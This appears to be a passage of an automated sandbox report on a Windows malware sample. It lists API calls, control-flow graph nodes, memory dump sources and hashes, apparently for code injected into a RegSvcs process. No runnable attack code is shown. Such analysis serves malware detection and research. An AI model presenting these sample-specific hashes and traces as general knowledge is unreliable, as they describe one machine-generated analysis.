                                                                                                              • Opcode Fuzzy Hash: 09f895661848e89bbbdbbdfd160d25bfae27accea9a42557eeb00bbdaf82cd0d
                                                                                                              • Instruction Fuzzy Hash: 6031E0B5D002499FDB10CF9AD884AEEFBF5FB48324F14842EE819A7210D774A945CFA4

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 774 4ccc6e4-4ccd5a4 776 4ccd5af-4ccd5be 774->776 777 4ccd5a6-4ccd5ac 774->777 778 4ccd5c0 776->778 779 4ccd5c3-4ccd5fc DrawTextExW 776->779 777->776 778->779 780 4ccd5fe-4ccd604 779->780 781 4ccd605-4ccd622 779->781 780->781
                                                                                                              APIs
                                                                                                              • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,04CCD53D,?,?), ref: 04CCD5EF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2018732985.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_4cc0000_STiokuWkiGFJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DrawText
                                                                                                              • String ID:
                                                                                                              • API String ID: 2175133113-0
                                                                                                              • Opcode ID: f5839bc9c8b358036721b390b855561dd6f76e0cab7883a3db937ffc23395970
                                                                                                              • Instruction ID: 22230e2bf70e6b878d3724bb0e7accf02b7a42663f6a3b0848ce0bb35db7750a
                                                                                                              • Opcode Fuzzy Hash: f5839bc9c8b358036721b390b855561dd6f76e0cab7883a3db937ffc23395970
                                                                                                              • Instruction Fuzzy Hash: EA31C2B59002499FDB10CF9AD884AAEFBF5FB48314F14842EE919A7210D775A944CFA4

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 794 26eb8d0-26ed854 DuplicateHandle 796 26ed85d-26ed87a 794->796 797 26ed856-26ed85c 794->797 797->796
                                                                                                              APIs
                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,026ED786,?,?,?,?,?), ref: 026ED847
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1994568043.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_26e0000_STiokuWkiGFJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DuplicateHandle
                                                                                                              • String ID:
                                                                                                              • API String ID: 3793708945-0
                                                                                                              • Opcode ID: 7658d3b732eebbc7de2e7930af72b47ceecb604a9d6d0362b00aeaf212421711
                                                                                                              • Instruction ID: e56805a8bc94e91498779baf0da67fd736b0399a5b650fd3869f438ed49d429f
                                                                                                              • Opcode Fuzzy Hash: 7658d3b732eebbc7de2e7930af72b47ceecb604a9d6d0362b00aeaf212421711
                                                                                                              • Instruction Fuzzy Hash: F921E4B5901258DFDB10CF9AD984ADEFFF8EB48314F14802AE915A7350D374A950CFA4

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 800 26ed7ba-26ed854 DuplicateHandle 801 26ed85d-26ed87a 800->801 802 26ed856-26ed85c 800->802 802->801
                                                                                                              APIs
                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,026ED786,?,?,?,?,?), ref: 026ED847
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1994568043.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_26e0000_STiokuWkiGFJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DuplicateHandle
                                                                                                              • String ID:
                                                                                                              • API String ID: 3793708945-0
                                                                                                              • Opcode ID: c1276af34c50520402028f33c50a006a7c0d7da58f57b2214e11f16d43705f2c
                                                                                                              • Instruction ID: 5f7e1bd94c864ed81064965ff705713ba146d1fec7ca75d6763f4f1efd679ced
                                                                                                              • Opcode Fuzzy Hash: c1276af34c50520402028f33c50a006a7c0d7da58f57b2214e11f16d43705f2c
                                                                                                              • Instruction Fuzzy Hash: 2D21E4B5D012589FDB10CF9AD584ADEFFF8EB48324F14801AE918A7310D374A950CFA5

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 805 4ccc82c-4ccf3a4 CreateIconFromResourceEx 807 4ccf3ad-4ccf3ca 805->807 808 4ccf3a6-4ccf3ac 805->808 808->807
                                                                                                              APIs
                                                                                                              • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,04CCF2F2,?,?,?,?,?), ref: 04CCF397
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2018732985.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_4cc0000_STiokuWkiGFJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateFromIconResource
                                                                                                              • String ID:
                                                                                                              • API String ID: 3668623891-0
                                                                                                              • Opcode ID: 751a4b6fc4cbd9e653748ee027f8b6cb855e5c6865b0627dc65283021c89445e
                                                                                                              • Instruction ID: d5ef13e4aa46c542d8f1664a4c03e83487510d022ac2b3bd8119a7122eb54085
                                                                                                              • Opcode Fuzzy Hash: 751a4b6fc4cbd9e653748ee027f8b6cb855e5c6865b0627dc65283021c89445e
                                                                                                              • Instruction Fuzzy Hash: 881179B1900359DFDB10CFAAC844BDEBFF9EB48320F14841AE954A7250C375A990DFA4
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 026EB13E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1994568043.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_26e0000_STiokuWkiGFJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HandleModule
                                                                                                              • String ID:
                                                                                                              • API String ID: 4139908857-0
                                                                                                              • Opcode ID: 1329c4b7a20c75f73ef022476f2152fe21387fcdb4d4dc921d645b6d2b71fc8d
                                                                                                              • Instruction ID: b5a70596fcd2f9582f37e41f5ba7c04efd5e9fa41d788c82e79ac08470a755a9
                                                                                                              • Opcode Fuzzy Hash: 1329c4b7a20c75f73ef022476f2152fe21387fcdb4d4dc921d645b6d2b71fc8d
                                                                                                              • Instruction Fuzzy Hash: 2F1110B5D002498FDB10CF9AD948ADEFBF4AB88328F10842AD419A7310C379A545CFA5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1977391889.0000000000BCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BCD000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_bcd000_STiokuWkiGFJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 29ae7015d19414b7ca5ceacde8855245037f9e3ca3706c69e64fa96a5f558e10
                                                                                                              • Instruction ID: 8c9482e0b17bd6c56232f62d161a9252639bc54a20238192a91cce5ec9edd7db
                                                                                                              • Opcode Fuzzy Hash: 29ae7015d19414b7ca5ceacde8855245037f9e3ca3706c69e64fa96a5f558e10
                                                                                                              • Instruction Fuzzy Hash: 3221E279500204DFDB09DF14D9C0F26BBA5EB94314F20C5BDDA094A356C336E856C6A1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1977391889.0000000000BCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BCD000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_bcd000_STiokuWkiGFJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 39732b945dd67b958b442858bdf7adee64ef96317f651cdac3bcdd27955a7c7f
                                                                                                              • Instruction ID: b1066410811addfe0a1018dc74f80c48c6338c28ea983c446dd369c3f280bc0a
                                                                                                              • Opcode Fuzzy Hash: 39732b945dd67b958b442858bdf7adee64ef96317f651cdac3bcdd27955a7c7f
                                                                                                              • Instruction Fuzzy Hash: 6A210379500240DFDB05DF14D9C0F2ABFA5FBA8318F20C5BDE9094B256C336D856CAA1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1990019617.000000000248D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0248D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_248d000_STiokuWkiGFJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7f680026d3247cd461e6c911fe71b546fe425eaaff8020006ba080a2154cdf57
                                                                                                              • Instruction ID: e38f0a0b5cde9a08a9b03257f2dc1af699010ce99e6b82e0efd275bc8e26a273
                                                                                                              • Opcode Fuzzy Hash: 7f680026d3247cd461e6c911fe71b546fe425eaaff8020006ba080a2154cdf57
                                                                                                              • Instruction Fuzzy Hash: 5D212271A04200DFDB14EF24D984B2ABBA5EB85318F20C56AD80A4B396C33AD447CA61
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1990019617.000000000248D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0248D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_248d000_STiokuWkiGFJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 07260306703fd297e4e92622ef1f0d3ed446911c66841b0dd8a88e068002446a
                                                                                                              • Instruction ID: 929e589835c26a2b4e12fd270e0bbbe0a31d0d374f686ee0803a8a38a7006208
                                                                                                              • Opcode Fuzzy Hash: 07260306703fd297e4e92622ef1f0d3ed446911c66841b0dd8a88e068002446a
                                                                                                              • Instruction Fuzzy Hash: EE210771914204DFDB05EF24D9C0B2ABBA5FB84314F20C66ED8094F395C336D446CA62
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1990019617.000000000248D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0248D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_248d000_STiokuWkiGFJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e331ce7d9fb866c2112109b87e3284d045fa57ef14710fa5f7ec2502562be9db
                                                                                                              • Instruction ID: 92237f12469ea84ca6e711cbeaf2e7bc6f66a7914e9364822ae68e4c3da0847c
                                                                                                              • Opcode Fuzzy Hash: e331ce7d9fb866c2112109b87e3284d045fa57ef14710fa5f7ec2502562be9db
                                                                                                              • Instruction Fuzzy Hash: 72218075509380CFDB02DF24D594716BF71EB46218F28C5DBD8498F2A7C33A940ACB62
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1977391889.0000000000BCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BCD000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_bcd000_STiokuWkiGFJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                              • Instruction ID: b8a689fb5d1ad3d00f1c9ece3c92e7d479836d49cae4c88281db4ffb9473618a
                                                                                                              • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                              • Instruction Fuzzy Hash: 3D11D376504280CFCB16CF14D9C4B16BFB1FBA4318F24C6AED8490B656C336D85ACBA1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1977391889.0000000000BCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BCD000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_bcd000_STiokuWkiGFJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                              • Instruction ID: ef193c23989a672774301ddfacf3d6ef58f1ad9d07919de1f80d830da878c468
                                                                                                              • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                              • Instruction Fuzzy Hash: B711DF76504240DFCB06CF00D9C4B16BFB1FB94324F24C2ADD9090B256C33AE85ACBA1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1990019617.000000000248D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0248D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_248d000_STiokuWkiGFJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                              • Instruction ID: d244b8b9fd11107253b2eb838482bff2d51f57983ba1282528bdaacbf4d6e3d6
                                                                                                              • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                              • Instruction Fuzzy Hash: 0B11BB75904280DFCB02DF24C5C4B1ABBA1FB84318F24C6AAD8494F396C33AD44ACB62

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:0.1%
                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                              Signature Coverage:0%
                                                                                                              Total number of Nodes:1
                                                                                                              Total number of Limit Nodes:0
                                                                                                              execution_graph 62075 ef2c1c LdrInitializeThunk

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 0 ef2c0a-ef2c0f 1 ef2c1f-ef2c26 LdrInitializeThunk 0->1 2 ef2c11-ef2c18 0->2
                                                                                                              APIs
                                                                                                              • LdrInitializeThunk.NTDLL(00F0FD4F,000000FF,00000024,00FA6634,00000004,00000000,?,-00000018,7D810F61,?,?,00EC8B12,?,?,?,?), ref: 00EF2C24
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.2152872422.0000000000EA6000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F06000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F42000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_e80000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: b009cc8668bd3ed680d5cdbda187cf568572214e66719fa3d2d7b8574a9c8477
                                                                                                              • Instruction ID: 17480c6f443d18187f374d7165e84a7cefe98dd459a3a99153ba629368802bfc
                                                                                                              • Opcode Fuzzy Hash: b009cc8668bd3ed680d5cdbda187cf568572214e66719fa3d2d7b8574a9c8477
                                                                                                              • Instruction Fuzzy Hash: F9B09B719019C5D5DB11E760460871B7900A7D0745F55C076D3430685F473CC5D1F175

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 4 ef2c1c-ef2c26 LdrInitializeThunk
                                                                                                              APIs
                                                                                                              • LdrInitializeThunk.NTDLL(00F0FD4F,000000FF,00000024,00FA6634,00000004,00000000,?,-00000018,7D810F61,?,?,00EC8B12,?,?,?,?), ref: 00EF2C24
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.2152872422.0000000000EA6000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F06000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F42000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_e80000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 2f4707d6dd47ef9ae99bf1b64ba321172db030b0600b6487318bc7a262600052
                                                                                                              • Instruction ID: 2b14a1c6af583236b93b91df74e60e9d696c7ac477f80c1cc5d5decb2d01a822
                                                                                                              • Opcode Fuzzy Hash: 2f4707d6dd47ef9ae99bf1b64ba321172db030b0600b6487318bc7a262600052
                                                                                                              • Instruction Fuzzy Hash: 1CA00262509586A5C105A26448AD4459B14B9A119138DC38BD18745C5B5F1C0097B9B3

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 5 ef2df0-ef2dfc LdrInitializeThunk
                                                                                                              APIs
                                                                                                              • LdrInitializeThunk.NTDLL(00F2E73E,0000005A,00F8D040,00000020,00000000,00F8D040,00000080,00F14A81,00000000,-00000001,-00000001,00000002,00000000,?,-00000001,00EFAE00), ref: 00EF2DFA
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.2152872422.0000000000EA6000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F06000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F42000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_e80000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 96fa63f81a1988009bbb4ae35df25fbb9a390d85da34d9d272797d22b6e97d74
                                                                                                              • Instruction ID: 20200a000333a19e4a8d3578e6451274fdc28c160dd7c972330afa92e75db843
                                                                                                              • Opcode Fuzzy Hash: 96fa63f81a1988009bbb4ae35df25fbb9a390d85da34d9d272797d22b6e97d74
                                                                                                              • Instruction Fuzzy Hash: FF90023130180463D21171588504707000987D0381FD5C423A082459CE9A5A8A53B121

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 6 ef35c0-ef35cc LdrInitializeThunk
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.2152872422.0000000000EA6000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F06000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F42000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_e80000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 86b3b036ef9d69b998accca5141c25a3d63a73738d6a6f16f30aa1fc0e627060
                                                                                                              • Instruction ID: e1ac8ec367f4626988451d8f30a891703a73ff1af286b650e85cd1265fb05707
                                                                                                              • Opcode Fuzzy Hash: 86b3b036ef9d69b998accca5141c25a3d63a73738d6a6f16f30aa1fc0e627060
                                                                                                              • Instruction Fuzzy Hash: E190023170590452D20071588514706100587D0341FA5C422A08245ACE8B998A5275A2

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 7 42ee29-42ee2f 8 42ee31 7->8 9 42edc8-42edce 7->9 12 42ee33-42ee45 8->12 10 42edd0-42edd7 9->10 11 42edea-42edee 9->11 13 42edd9-42ede2 10->13 15 42ee4b-42ee52 12->15 13->13 14 42ede4-42ede9 13->14 16 42ee66-42ee69 15->16 17 42ee54-42ee56 15->17 17->16 18 42ee58-42ee64 call 42edf3 17->18 18->16
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.2152262483.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_42e000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0bd85229da903fbc9481f62a8f54e59b6c697e4c63c54f24657a10d75eb00789
                                                                                                              • Instruction ID: c40e740c81eec2e8b7a06381501afc2d45d636e991fdca20ea99b2323e295532
                                                                                                              • Opcode Fuzzy Hash: 0bd85229da903fbc9481f62a8f54e59b6c697e4c63c54f24657a10d75eb00789
                                                                                                              • Instruction Fuzzy Hash: 2DF0D127B0127167D620555B7C05A97BB6ACFC2A64B4900ABFA48EB301D469AC0082E4

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 33 42e923-42e964 call 42edf3 37 42e966-42e983 33->37 38 42e9be-42e9c3 33->38 40 42e996-42e9bb 37->40 41 42e985-42e98d 37->41 40->38 43 42e993 41->43 43->40
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.2152262483.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_42e000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 88e8f1c4df472a8417167208be93b0b50c212a591239faeca731d1d13e1655d0
                                                                                                              • Instruction ID: 29140e077c9d6363efc685f9344a9c90a4968142544a48ffa7a4c0b9c839e5c0
                                                                                                              • Opcode Fuzzy Hash: 88e8f1c4df472a8417167208be93b0b50c212a591239faeca731d1d13e1655d0
                                                                                                              • Instruction Fuzzy Hash: E801B9B1D0012866FB20EBD5DC42FDA73786B04705F5446DEA50CE6181EF7876888B59

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 21 42e920-42e93a 22 42e949-42e950 21->22 23 42e944 call 42edf3 21->23 24 42e95f-42e964 22->24 23->22 25 42e966-42e96f 24->25 26 42e9be-42e9c3 24->26 27 42e97e-42e983 25->27 28 42e996-42e9bb 27->28 29 42e985-42e98d 27->29 28->26 31 42e993 29->31 31->28
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.2152262483.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_42e000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 69ece9336c1e9b1aee075c9fb0da6218fbe15404a60b3460a0cacd0f4e0a3e98
                                                                                                              • Instruction ID: 04b9e68fb8965ea2c4d27a5fe8f18fc46a0f44bcf54aaa5cc54338073fd29f8f
                                                                                                              • Opcode Fuzzy Hash: 69ece9336c1e9b1aee075c9fb0da6218fbe15404a60b3460a0cacd0f4e0a3e98
                                                                                                              • Instruction Fuzzy Hash: 660192B1D0052866FB20EF95DC42FEA73B8AB04305F5446DEA50CE6181EB7866888B59

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 45 42ecc4 46 42ecc9-42ecfb 45->46 47 42ed01-42ed12 46->47
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.2152262483.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_42e000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3ae2edd20352a1ad61482efaa2d96a3b44b9760b28c01e5775a2aec239a1651b
                                                                                                              • Instruction ID: a071dd11a00a9c90de2fefbb0e66054dab0ba5b02ba32aaa4d1ef8410196240c
                                                                                                              • Opcode Fuzzy Hash: 3ae2edd20352a1ad61482efaa2d96a3b44b9760b28c01e5775a2aec239a1651b
                                                                                                              • Instruction Fuzzy Hash: 7FF01271510209AFDB04CF69C881EEE77A8EB88360F048619FC29CB245D774E621CB50

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 48 42ecd3-42ecfb 49 42ed01-42ed12 48->49
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.2152262483.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_42e000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: aa4371afe0688e425efbc913df122ad324937efed31953b7d488b72d7573f906
                                                                                                              • Instruction ID: 84694b756ef5616c5bedb289d21b3a53db4618e96811d42f516f0ab5cec2f1ac
                                                                                                              • Opcode Fuzzy Hash: aa4371afe0688e425efbc913df122ad324937efed31953b7d488b72d7573f906
                                                                                                              • Instruction Fuzzy Hash: C9F0AC76610209AFDB04CF59D881EEB77A9EB88750F04C519FD198B241D774EA25CBA0

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 50 42ee33-42ee45 51 42ee4b-42ee52 50->51 52 42ee66-42ee69 51->52 53 42ee54-42ee56 51->53 53->52 54 42ee58-42ee64 call 42edf3 53->54 54->52
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.2152262483.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_42e000_RegSvcs.jbxd
                                                                                                              Similarity
